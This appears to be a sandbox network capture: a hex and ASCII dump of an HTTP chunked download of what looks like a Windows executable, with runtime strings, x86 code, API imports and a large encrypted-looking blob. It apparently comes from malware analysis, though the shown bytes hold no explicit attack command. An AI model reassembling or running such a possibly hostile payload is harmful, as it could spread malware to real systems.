                    2022-11-24 19:13:26 UTC8INData Raw: 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75 72 65 27 00 00 00 00 60 70 6c 61 63 65 6d 65 6e 74 20 64 65 6c 65 74 65 20 63 6c 6f 73 75 72 65 27 00 00 60 6f 6d 6e 69 20 63 61 6c 6c 73 69 67 27 00 00 20 64 65 6c 65 74 65 5b 5d 00 00 00 20 6e 65 77 5b 5d 00 00 60 6c 6f 63 61 6c 20 76 66 74 61 62 6c 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 63 6c 6f 73 75 72 65 27 00 60 6c 6f 63
                    Data Ascii: eh vector copy constructor iterator'`managed vector destructor iterator'`managed vector constructor iterator'`placement delete[] closure'`placement delete closure'`omni callsig' delete[] new[]`local vftable constructor closure'`loc
                    2022-11-24 19:13:26 UTC8INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC8INData Raw: 32 30 30 30 0d 0a 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 69 72 74 75 61 6c 20 64 69 73 70 6c 61 63 65 6d 65 6e 74 20 6d 61 70 27 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 73 63 61 6c 61 72 20 64 65 6c 65 74 69 6e 67 20 64 65 73 74 72 75 63 74 6f 72 27 00 00 00 00 60 64 65 66 61 75 6c 74 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 63 6c 6f 73 75 72 65 27 00 00 00 60
                    Data Ascii: 2000estructor iterator'`eh vector constructor iterator'`virtual displacement map'`vector vbase constructor iterator'`vector destructor iterator'`vector constructor iterator'`scalar deleting destructor'`default constructor closure'`
                    2022-11-24 19:13:26 UTC16INData Raw: 08 e8 f1 f3 ff ff
                    Data Ascii:
                    2022-11-24 19:13:26 UTC16INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC16INData Raw: 32 30 30 30 0d 0a 83 c4 10 5d c2 14 00 55 8b ec 51 8a 45 ff c9 c3 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 e9 f3 ff ff 83 c4 10 5d c2 14 00 55 8b ec 8b 45 08 5d c3 55 8b ec 51 8a 45 ff c9 c2 04 00 55 8b ec 8b 45 08 8b 00 5d c3 b0 01 c2 08 00 6a 01 ff 31 83 c1 04 e8 a7 fd ff ff c3 55 8b ec 51 56 8b 75 08 8d 45 ff 50 c6 45 ff 00 89 71 14 e8 7b fd ff ff 03 c6 50 e8 54 f3 ff ff 59 59 5e c9 c2 04 00 83 c1 08 e9 ed fd ff ff 55 8b ec 6a 00 ff 75 08 e8 76 fe ff ff 5d c2 04 00 e8 e9 fd ff ff 83 f8 01 77 04 33 c0 40 c3 48 c3 55 8b ec 6a 00 ff 75 08 e8 97 fe ff ff 5d c2 04 00 55 8b ec 56 ff 75 08 8b f1 e8 c3 fd ff ff 8b c6 5e 5d c2 04 00 55 8b ec ff 75 08 e8 fc fd ff ff 33 c9 84 c0 0f 94 c1 8a c1 5d c2 04 00 56 8b f1 e8 8c fd ff ff 8b c6 5e c3 55 8b ec 6a 00
                    Data Ascii: 2000]UQEUuuuu]UE]UQEUE]j1UQVuEPEq{PTYY^Ujuv]w3@HUju]UVu^]Uu3]V^Uj
                    2022-11-24 19:13:26 UTC24INData Raw: 00 59 89 7d fc f6
                    Data Ascii: Y}
                    2022-11-24 19:13:26 UTC24INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC24INData Raw: 32 30 30 30 0d 0a 46 0c 40 75 77 56 e8 2e 59 00 00 59 83 f8 ff 74 1b 83 f8 fe 74 16 8b d0 c1 fa 05 8b c8 83 e1 1f c1 e1 06 03 0c 95 e0 7a 69 00 eb 05 b9 50 be 47 00 f6 41 24 7f 75 29 83 f8 ff 74 19 83 f8 fe 74 14 8b c8 c1 f9 05 83 e0 1f c1 e0 06 03 04 8d e0 7a 69 00 eb 05 b8 50 be 47 00 f6 40 24 80 74 1c e8 d2 0b 00 00 c7 00 16 00 00 00 57 57 57 57 57 e8 2d f7 ff ff 83 c4 14 83 4d e4 ff 39 7d e4 75 21 ff 4e 04 78 0e 8b 0e 8a 45 08 88 01 0f b6 c0 ff 06 eb 0b 56 ff 75 08 e8 82 53 00 00 59 59 89 45 e4 c7 45 fc fe ff ff ff e8 0c 00 00 00 8b 45 e4 e8 0b 48 00 00 c3 8b 75 0c 56 e8 24 52 00 00 59 c3 8b ff 55 8b ec ff 75 08 ff 15 44 11 40 00 85 c0 75 08 ff 15 40 11 40 00 eb 02 33 c0 85 c0 74 0c 50 e8 75 0b 00 00 59 83 c8 ff 5d c3 33 c0 5d c3 8b ff 55 8b ec 5d e9
                    Data Ascii: 2000F@uwV.YYttziPGA$u)ttziPG@$tWWWWW-M9}u!NxEVuSYYEEEHuV$RYUuD@u@@3tPuY]3]U]
                    2022-11-24 19:13:26 UTC32INData Raw: 74 20 d9 c9 db bd
                    Data Ascii: t
                    2022-11-24 19:13:26 UTC32INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC32INData Raw: 32 30 30 30 0d 0a 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 dd d8 dd d8 db 2d e0 b8 47 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc db 6c 24 10 db 6c 24 04 8b 44 24 08 03 c0 0f 83 86 00 00 00 35 00 00 00 0e a9 00 00 00 0e 74 03 de f9 c3 c1 e8 1c 80 b8 10 b9 47 00 00 75 03 de f9 c3 8b 44 24 0c 25 ff 7f 00 00 74 67 3d ff 7f 00 00 74 60 d9 7c 24 1c 8b 44 24 1c 0d 3f 03 00 00 25 ff f3 00 00 89 44 24 20 d9 6c 24 20 8b 44 24 18 25 ff 7f 00 00 83 f8 01 74 17 d8 0d 20 b9 47 00 d9 c9 d8 0d 20 b9 47 00 d9 c9 d9 6c 24 1c de f9 c3 d8 0d 24 b9 47 00 d9 c9 d8 0d 24 b9 47 00 d9 c9 d9 6c 24 1c de f9 c3 8b 44 24 04 0b 44 24 08 75 03 de f9 c3 8b 44
                    Data Ascii: 2000bbi@tpp-Gpptl$l$D$5tGuD$%tg=t`|$D$?%D$ l$ D$%t G Gl$$G$Gl$D$D$uD
                    2022-11-24 19:13:26 UTC40INData Raw: 75 d8 e8 d7 bb ff
                    Data Ascii: u
                    2022-11-24 19:13:26 UTC40INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC40INData Raw: 32 30 30 30 0d 0a ff 59 e8 1b f7 ff ff 8b 4d d4 89 88 88 00 00 00 e8 0d f7 ff ff 8b 4d d0 89 88 8c 00 00 00 81 3e 63 73 6d e0 75 42 83 7e 10 03 75 3c 8b 46 14 3d 20 05 93 19 74 0e 3d 21 05 93 19 74 07 3d 22 05 93 19 75 24 83 7d cc 00 75 1e 83 7d e4 00 74 18 ff 76 18 e8 59 bb ff ff 59 85 c0 74 0b ff 75 10 56 e8 25 fd ff ff 59 59 c3 6a 0c 68 00 9d 41 00 e8 07 08 00 00 33 d2 89 55 e4 8b 45 10 8b 48 04 3b ca 0f 84 58 01 00 00 38 51 08 0f 84 4f 01 00 00 8b 48 08 3b ca 75 0c f7 00 00 00 00 80 0f 84 3c 01 00 00 8b 00 8b 75 0c 85 c0 78 04 8d 74 31 0c 89 55 fc 33 db 43 53 a8 08 74 41 8b 7d 08 ff 77 18 e8 c5 66 00 00 59 59 85 c0 0f 84 f2 00 00 00 53 56 e8 b4 66 00 00 59 59 85 c0 0f 84 e1 00 00 00 8b 47 18 89 06 8b 4d 14 83 c1 08 51 50 e8 ec fc ff ff 59 59 89 06 e9
                    Data Ascii: 2000YMM>csmuB~u<F= t=!t="u$}u}tvYYtuV%YYjhA3UEH;X8QOH;u<uxt1U3CStA}wfYYSVfYYGMQPYY
                    2022-11-24 19:13:26 UTC48INData Raw: 00 8b 95 64 fe ff
                    Data Ascii: d
                    2022-11-24 19:13:26 UTC48INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC48INData Raw: 32 30 30 30 0d 0a ff ff 85 74 fe ff ff e8 d6 f9 ff ff 89 85 78 fe ff ff 0f b6 c0 50 e8 fb 37 00 00 59 85 c0 75 8a 83 bd 58 fe ff ff 00 0f 84 5f 01 00 00 83 bd 78 fe ff ff 65 74 0d 83 bd 78 fe ff ff 45 0f 85 49 01 00 00 8b 85 6c fe ff ff ff 8d 6c fe ff ff 85 c0 0f 84 35 01 00 00 8b 85 54 fe ff ff c6 04 03 65 8d 85 30 fe ff ff 50 8d 85 7c fe ff ff 50 43 53 8d bd 54 fe ff ff 8d b5 24 fe ff ff e8 e9 f8 ff ff 83 c4 0c 85 c0 0f 84 f5 08 00 00 8b 95 64 fe ff ff ff 85 74 fe ff ff e8 44 f9 ff ff 89 85 78 fe ff ff 83 f8 2d 75 2c 8b 85 54 fe ff ff c6 04 03 2d 8d 85 30 fe ff ff 50 8d 85 7c fe ff ff 50 43 53 e8 a3 f8 ff ff 83 c4 0c 85 c0 0f 84 af 08 00 00 eb 09 83 bd 78 fe ff ff 2b 75 2f 8b 85 6c fe ff ff ff 8d 6c fe ff ff 85 c0 75 08 21 85 6c fe ff ff eb 17 8b 95 64
                    Data Ascii: 2000txP7YuX_xetxEIll5Te0P|PCST$dtDx-u,T-0P|PCSx+u/llu!ld
                    2022-11-24 19:13:26 UTC56INData Raw: 09 75 06 8b 4d 08
                    Data Ascii: uM
                    2022-11-24 19:13:26 UTC56INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC56INData Raw: 31 66 66 38 0d 0a 21 59 04 8b 5d 0c 8b 53 08 8b 5b 04 8b 4d fc 03 4d f4 89 5a 04 8b 55 0c 8b 5a 04 8b 52 08 89 53 08 89 4d fc 8b d1 c1 fa 04 4a 83 fa 3f 76 03 6a 3f 5a 8b 5d f8 83 e3 01 89 5d f4 0f 85 8f 00 00 00 2b 75 f8 8b 5d f8 c1 fb 04 6a 3f 89 75 0c 4b 5e 3b de 76 02 8b de 03 4d f8 8b d1 c1 fa 04 4a 89 4d fc 3b d6 76 02 8b d6 3b da 74 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b 4d 0c 8b 71 08 8b 49 04 89 4e 04 8b 4d 0c 8b 71 04 8b 49 08 89 4e 08 8b 75 0c eb 03 8b 5d 08 83 7d f4 00 75 08 3b da 0f 84 80 00 00 00 8b 4d f0 8d 0c d1 8b 59 04 89 4e 08 89 5e 04 89 71 04 8b 4e 04 89 71 08
                    Data Ascii: 1ff8!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu; s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNq
                    2022-11-24 19:13:26 UTC64INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC64INData Raw: ff 08 00 00 00 51 8d 7e 18 57 ff b5 7c ff ff ff e8 bb 4e 00 00 83 c4 0c 85 c0 75 49 8b 43 08 83 f8 10 74 10 83 f8 16 74 0b 83 f8 1d 74 06 83 65 c0 fe eb 12 8b 4d c0 dd 46 10 83 e1 e3 dd 5d b0 83 c9 03 89 4d c0 57 8d 4e 08 51 50 ff b5 7c ff ff ff 8d 85 78 ff ff ff 50 8d 45 80 50 e8 4b 4e 00 00 83 c4 18 68 ff ff 00 00 ff b5 78 ff ff ff e8 8e 50 00 00 83 3e 08 59 59 74 14 83 3d 28 c8 47 00 00 75 0b 56 e8 54 50 00 00 59 85 c0 75 08 ff 36 e8 1b 50 00 00 59 8b 4d fc 5f 33 cd 5e e8 df 63 ff ff 8b e5 5d 8b e3 5b c3 6a 0c 68 58 9e 41 00 e8 cd a7 ff ff 83 65 fc 00 66 0f 28 c1 c7 45 e4 01 00 00 00 eb 23 8b 45 ec 8b 00 8b 00 3d 05 00 00 c0 74 0a 3d 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 65 e4 00 c7 45 fc fe ff ff ff 8b 45 e4 e8 cf a7 ff ff c3 8b ff 55 8b
                    Data Ascii: Q~W|NuICttteMF]MWNQP|xPEPKNhxP>YYt=(GuVTPYu6PYM_3^c][jhXAef(E#E=t=t33@eeEEU
                    2022-11-24 19:13:26 UTC72INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC72INData Raw: 32 30 30 30 0d 0a 10 f7 e6 03 d1 72 0e 3b 54 24 0c 77 08 72 0f 3b 44 24 08 76 09 4e 2b 44 24 10 1b 54 24 14 33 db 2b 44 24 08 1b 54 24 0c f7 da f7 d8 83 da 00 8b ca 8b d3 8b d9 8b c8 8b c6 5e c2 10 00 8b ff 55 8b ec 83 ec 14 56 57 ff 75 08 8d 4d ec e8 9b 4f ff ff 8b 45 10 8b 75 0c 33 ff 3b c7 74 02 89 30 3b f7 75 2c e8 d6 4b ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 31 37 ff ff 83 c4 14 80 7d f8 00 74 07 8b 45 f4 83 60 70 fd 33 c0 e9 d8 01 00 00 39 7d 14 74 0c 83 7d 14 02 7c c9 83 7d 14 24 7f c3 8b 4d ec 53 8a 1e 89 7d fc 8d 7e 01 83 b9 ac 00 00 00 01 7e 17 8d 45 ec 50 0f b6 c3 6a 08 50 e8 73 0b 00 00 8b 4d ec 83 c4 0c eb 10 8b 91 c8 00 00 00 0f b6 c3 0f b7 04 42 83 e0 08 85 c0 74 05 8a 1f 47 eb c7 80 fb 2d 75 06 83 4d 18 02 eb 05 80 fb 2b 75 03 8a 1f 47
                    Data Ascii: 2000r;T$wr;D$vN+D$T$3+D$T$^UVWuMOEu3;t0;u,KWWWWW17}tE`p39}t}|}$MS}~~EPjPsMBtG-uM+uG
                    2022-11-24 19:13:26 UTC80INData Raw: 0f b7 c0 33 c9 0f
                    Data Ascii: 3
                    2022-11-24 19:13:26 UTC80INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC80INData Raw: 32 30 30 30 0d 0a bf d8 66 89 4d e0 b9 30 ca 47 00 f7 db 83 e9 60 89 45 b4 66 89 55 ea 89 75 e6 89 7d e2 89 4d 9c 85 db 0f 84 9c 02 00 00 7d 0d b8 90 cb 47 00 f7 db 83 e8 60 89 45 9c 85 db 0f 84 85 02 00 00 83 45 9c 54 8b cb 83 e1 07 c1 fb 03 85 c9 0f 84 67 02 00 00 6b c9 0c 03 4d 9c 8b c1 89 4d bc b9 00 80 00 00 66 39 08 72 11 8b f0 8d 7d c4 a5 a5 8d 45 c4 a5 ff 4d c6 89 45 bc 0f b7 50 0a 33 c9 89 4d ac 89 4d f0 89 4d f4 89 4d f8 8b 4d ea 8b f2 33 f1 81 e6 00 80 00 00 89 75 b8 be ff 7f 00 00 23 ce 23 d6 8d 34 0a 0f b7 fe be ff 7f 00 00 66 3b ce 0f 83 ac 02 00 00 66 3b d6 0f 83 a3 02 00 00 be fd bf 00 00 66 3b fe 0f 87 95 02 00 00 be bf 3f 00 00 66 3b fe 77 10 33 f6 89 75 e8 89 75 e4 89 75 e0 e9 d3 01 00 00 33 f6 66 3b ce 75 1f 47 f7 45 e8 ff ff ff 7f 75
                    Data Ascii: 2000fM0G`EfUu}M}G`EETgkMMf9r}EMEP3MMMMM3u##4f;f;f;?f;w3uuu3f;uGEu
                    2022-11-24 19:13:26 UTC88INData Raw: ff 15 40 11 40 00
                    Data Ascii: @@
                    2022-11-24 19:13:26 UTC88INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC88INData Raw: 32 30 30 30 0d 0a 50 e8 5f 0c ff ff 59 83 4d ec ff 8b 45 f4 3b 45 0c 74 07 50 e8 63 06 ff ff 59 8b 45 ec 83 f8 fe 0f 85 8b 01 00 00 8b 45 f0 e9 83 01 00 00 8b 45 f0 8b 17 33 c9 3b c3 0f 95 c1 03 c0 89 45 f0 89 4c 16 30 eb c6 3b cb 74 0e 8b 4d f4 66 83 39 0a 75 05 80 08 04 eb 03 80 20 fb 8b 5d f4 8b 45 f0 03 c3 89 5d 10 89 45 f0 3b d8 0f 83 ff 00 00 00 8b 45 10 0f b7 08 66 83 f9 1a 0f 84 d7 00 00 00 66 83 f9 0d 74 0f 66 89 0b 43 43 40 40 89 45 10 e9 b4 00 00 00 8b 4d f0 83 c1 fe 3b c1 73 1e 8d 48 02 66 83 39 0a 75 0d 83 c0 04 89 45 10 6a 0a e9 8e 00 00 00 89 4d 10 e9 84 00 00 00 83 45 10 02 6a 00 8d 45 e8 50 6a 02 8d 45 f8 50 8b 07 ff 34 06 ff 15 08 12 40 00 85 c0 75 0a ff 15 40 11 40 00 85 c0 75 5b 83 7d e8 00 74 55 8b 07 f6 44 06 04 48 74 28 66 83 7d f8
                    Data Ascii: 2000P_YME;EtPcYEEE3;EL0;tMf9u ]E]E;EfftfCC@@EM;sHf9uEjMEjEPjEP4@u@@u[}tUDHt(f}
                    2022-11-24 19:13:26 UTC96INData Raw: 00 00 00 00 00 00
                    Data Ascii:
                    2022-11-24 19:13:26 UTC96INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC96INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC104INData Raw: 00 00 95 01 47 65
                    Data Ascii: Ge
                    2022-11-24 19:13:26 UTC104INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC104INData Raw: 32 30 30 30 0d 0a 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 1a 03 4d 75 6c 74 69 42 79 74 65 54 6f 57 69 64 65 43 68 61 72 00 e1 02 4c 43 4d 61 70 53 74 72 69 6e 67 41 00 00 e3 02 4c 43 4d 61 70 53 74 72 69 6e 67 57 00 00 3d 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 41 00 00 40 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 e8 01 47 65 74 4c 6f 63 61 6c 65 49 6e 66 6f 41 00 00 41 01 46 6c 75 73 68 46 69 6c 65 42 75 66 66 65 72 73 00 00 fc 03 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 82 04 57 72 69 74 65 43 6f 6e 73 6f 6c 65 41 00 99 01 47 65 74 43 6f 6e 73 6f 6c 65 4f 75 74 70 75 74 43 50 00 00 8c 04 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 68 03 52 65 61 64 46 69 6c 65 00 00 43 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 78 00 43 72 65 61 74 65 46 69 6c
                    Data Ascii: 2000tConsoleModeMultiByteToWideCharLCMapStringALCMapStringW=GetStringTypeA@GetStringTypeWGetLocaleInfoAAFlushFileBuffersSetStdHandleWriteConsoleAGetConsoleOutputCPWriteConsoleWhReadFileCCloseHandlexCreateFil
                    2022-11-24 19:13:26 UTC112INData Raw: f5 8e f6 fe 55 78
                    Data Ascii: Ux
                    2022-11-24 19:13:26 UTC112INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC112INData Raw: 32 30 30 30 0d 0a c8 4e eb 11 3b b2 34 2a f5 90 d4 f2 92 72 f2 d8 09 cc 20 ff f1 71 87 aa 69 17 35 92 67 4b c3 a2 f9 dd 9a 69 b5 90 73 24 c7 b0 e5 7f ab 9c 76 b6 60 5e 47 a0 9d 93 3f 91 ea b3 21 e7 92 67 ae 99 d1 7e d0 15 45 89 bd bb 93 b4 9e 7a e9 ff 8a 76 b4 6d e8 46 ad b3 0a 9a 26 17 cd 86 bf f0 01 1a b5 30 5b e5 62 10 93 f1 28 8b 93 2e 57 9c 76 b5 a2 22 b9 f1 8e df 8b f0 32 70 1c 10 68 e1 83 f1 78 1e a3 d5 33 29 03 cb 03 99 fc e1 c2 b6 54 94 00 09 49 67 7f dc 57 57 71 80 27 0a 22 18 ca 9f de de 8f fb a0 61 30 d0 c1 45 90 b9 5b 89 e7 4b 8e 14 01 41 0d 7d 5d 94 15 4b bc bb 3c 51 ed 15 39 ff 8d 86 69 4c 94 13 95 d0 25 b8 12 9f f4 4c 69 6e b6 5b a0 69 77 18 76 b4 fd a4 aa f2 10 fe a8 3e aa bc 00 85 23 f0 d1 e4 0e 09 66 9c a8 97 39 c5 35 41 ea 51 97 60 d8
                    Data Ascii: 2000N;4*r qi5gKis$v`^G?!g~EzvmF&0[b(.Wv"2phx3)TIgWWq'"a0E[KA}]K<Q9iL%Lin[iwv>#f95AQ`
                    2022-11-24 19:13:26 UTC120INData Raw: 09 cb 0c 8d 13 fd
                    Data Ascii:
                    2022-11-24 19:13:26 UTC120INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC120INData Raw: 31 66 66 38 0d 0a 74 17 2d c5 9a 79 e9 f4 6a ea 90 bc f7 05 9b 22 5d 55 bc b4 ba eb e6 9b 43 f2 85 08 c6 ce ec 40 b0 30 1d 23 f6 a9 64 4c 2d ad 74 fe 8b 5f f3 37 99 e0 e8 1e 19 02 44 8a b7 58 38 44 c5 b9 b1 0d 64 0a 01 8e 6c f6 18 a6 d0 22 f9 4d 85 a7 3b 15 7f 36 d9 c4 7b b4 7c 27 6c 61 a4 d0 07 41 ec fe 47 db b8 0e 7f e5 70 f1 96 13 fb de af 77 c3 60 c3 52 bb 09 aa 93 98 56 23 d7 e8 18 b9 73 f7 f9 61 1b ed aa ab 81 b9 37 97 01 4f a4 14 3a ac 6d 49 46 3a 2a c5 1d e9 b5 4a 45 19 65 ee c3 95 03 56 30 02 43 14 92 e1 2a 5b bc 9e ba 82 5d c9 73 2b 72 a4 ee 74 8d 47 d4 97 6d 10 32 45 c3 c5 7b b0 1c d3 bd 11 7e b5 1f d0 20 a3 d0 0d 20 46 7f 40 c2 2c 70 8d 23 4f 91 a7 64 cd 0e 05 7a 71 de be 3f fc cc 43 1a 1a 95 cd 57 d9 d0 99 51 2e 80 a1 a5 71 1c 31 59 95 f6 a3
                    Data Ascii: 1ff8t-yj"]UC@0#dL-t_7DX8Ddl"M;6{|'laAGpw`RV#sa7O:mIF:*JEeV0C*[]s+rtGm2E{~ F@,p#Odzq?CWQ.q1Y
                    2022-11-24 19:13:26 UTC128INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC128INData Raw: 4f 14 02 27 75 21 0a 21 92 d8 0f 0f 6c 5a 20 56 ca 3b 3f 50 08 17 9a 7e 2d d5 42 62 71 18 7f 0c 8b aa e8 16 45 6c 55 01 f0 34 51 bc d0 fd 5c 3f a5 4a 8c 46 89 ed 82 dc 5c c4 3a cb 98 0d e7 a4 bc 2a e0 6c d5 58 d9 02 77 f6 21 d6 6a 3f 80 4b dc ff a5 c7 4d d7 93 ae 8a 84 b1 d5 2a bb b8 ef 9b 9a 2f ad bf ed 68 de 23 3a df 2d dd 8b 7e 7a b7 88 03 37 4e 35 68 c3 37 d8 68 1e 33 ef f4 08 1a 61 3f 75 51 4a 09 0b a2 79 f5 a3 78 ac 55 0a 1a a5 cc df 50 88 28 a2 51 01 bc b5 f3 9e 83 c0 1e d3 ab f5 1b 20 13 f9 90 99 d0 b7 2d 59 fe e8 9e 2e 28 4d 0b f2 98 c7 de 73 9e d7 5b e6 10 fe fb 72 c8 c1 9d 6d 21 88 93 ed 4e 33 c6 27 31 05 95 44 ed 8a e8 ca 6f c8 06 8d ca ee 08 18 d3 b5 08 cc 20 3a d4 84 f9 13 f1 a6 d1 5a 9b 91 bf 9e 3b 47 ca b6 85 65 bf ed 77 7d f9 3d ec 40 61
                    Data Ascii: O'u!!lZ V;?P~-BbqElU4Q\?JF\:*lXw!j?KM*/h#:-~z7N5h7h3a?uQJyxUP(Q -Y.(Ms[rm!N3'1Do :Z;Gew}=@a
                    2022-11-24 19:13:26 UTC136INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC136INData Raw: 32 30 30 30 0d 0a f3 cd 0a 3e 79 2d 81 7e 76 90 b7 34 b3 92 ed 71 dd c9 9f 79 49 3a 0b 2c 82 ce 86 07 72 f8 ca f4 32 13 d1 a3 33 d7 e0 35 aa 4b 4f df 40 2b 92 d9 43 b5 ca 0c 18 12 b0 d6 bf ef 5c 10 61 bd 64 8d 9f 11 8b 03 e4 bc 6a bb 48 dd ee 35 5f 25 b7 46 ba 42 c6 fc b1 57 2b 43 e4 d2 af 54 59 a4 34 9c df 63 93 4c 02 8f 02 cd d5 a7 a9 e1 eb 11 d4 a4 70 ad 96 07 df 1d 75 7b 8f 71 61 67 60 8c e2 7f f5 13 44 13 d3 ed 15 39 c9 ee ab 03 08 57 68 12 f3 ef 11 9f c6 8e 5c e7 e3 b4 47 21 d1 f7 21 4e 88 38 6a 28 8e 89 7d 0a 09 22 65 f3 44 47 b6 4f 4d 38 d8 7f 83 9a 03 cc de fd 96 17 ea 35 70 32 5d 5c 5b 1b 4d f5 8a ad 2c 53 50 79 7c 2e 45 40 64 f4 81 69 6b 19 f4 3c 64 7a 97 d9 a3 50 49 da b2 a1 74 c1 42 4c 9a ba 52 60 33 e9 25 de a2 7e 5c c6 fb fe ab fd 08 bc 1e
                    Data Ascii: 2000>y-~v4qyI:,r235KO@+C\adjH5_%FBW+CTY4cLpu{qag`D9Wh\G!!N8j(}"eDGOM85p2]\[M,SPy|.E@dik<dzPItBLR`3%~\
                    2022-11-24 19:13:26 UTC144INData Raw: 81 6b 3c c3 2f 12
                    Data Ascii: k</
                    2022-11-24 19:13:26 UTC144INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC144INData Raw: 32 30 30 30 0d 0a 15 d9 36 a5 e7 ab 72 3a 5d 5e c9 c3 41 f4 14 6b 8a 4e 2f b7 99 2c 5e 9e c8 e8 ee 01 19 54 8b 98 d0 86 3c 77 0f e7 2f 51 45 bc f7 c9 b2 65 dc 51 81 00 f9 c2 e0 7c bc 6e 18 12 b0 e1 91 8f 93 b0 e2 ca 20 28 fc 52 e4 05 a9 ea 0e 59 e1 4f 6f 03 46 67 e5 47 63 a0 b3 d1 a7 2a 29 d8 c9 21 86 90 8d 21 dc fb ce db c8 f8 39 d5 67 91 a2 33 1d 18 ec 04 51 d8 df 21 97 56 9c af f5 ad 00 3d f0 1c de f8 92 9f 81 37 75 92 d0 67 1a b7 8a 00 b2 7d 60 56 ac 3c ec cf d0 61 22 ae 10 f7 87 3e 2e f6 c0 f9 90 d3 83 ff 44 f8 87 a6 88 37 7e 7a d5 fc 0b e5 44 f4 05 7d d5 90 28 f7 a8 fb be 02 54 6a d1 2e 2a fa 0c 60 26 ef b2 b3 d1 ed a7 03 05 80 f9 95 39 50 2b 05 49 de 8c 53 b2 0e 40 db a6 8f e0 64 39 27 63 8e 54 89 bb 37 d6 9b e4 0c d7 5c 21 e5 0b 3d fe 31 4a 78 d3
                    Data Ascii: 20006r:]^AkN/,^T<w/QEeQ|n (RYOoFgGc*)!!9g3Q!V=7ug}`V<a">.D7~zD}(Tj.*`&9P+IS@d9'cT7\!=1Jx
                    2022-11-24 19:13:26 UTC152INData Raw: 4e 3f cd 0f f2 8d
                    Data Ascii: N?
